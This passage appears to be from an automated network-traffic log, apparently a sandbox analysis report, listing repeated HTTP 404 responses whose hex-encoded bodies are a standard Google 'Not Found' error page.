Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:50 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:55 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 09:00:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 